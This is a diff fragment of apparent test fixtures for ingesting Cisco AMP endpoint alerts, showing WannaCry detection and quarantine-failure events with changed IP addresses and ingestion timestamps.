"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6941,7 +6941,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6986,7 +6986,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6996,8 +6996,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025455291Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764492700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -7017,7 +7017,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7062,7 +7062,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7072,8 +7072,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025457585Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764498600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -7093,7 +7093,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7147,7 +7147,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7164,8 +7164,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025459833Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764503500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7187,7 +7187,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7237,7 +7237,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7254,8 +7254,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025462032Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764508400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7277,7 +7277,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7327,7 +7327,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7344,8 +7344,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025468432Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764512800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7367,7 +7367,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7417,7 +7417,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7434,8 +7434,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025471879Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764517800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7457,7 +7457,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7507,7 +7507,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -7524,8 +7524,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025474160Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764523900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -7547,7 +7547,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -7597,7 +7597,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
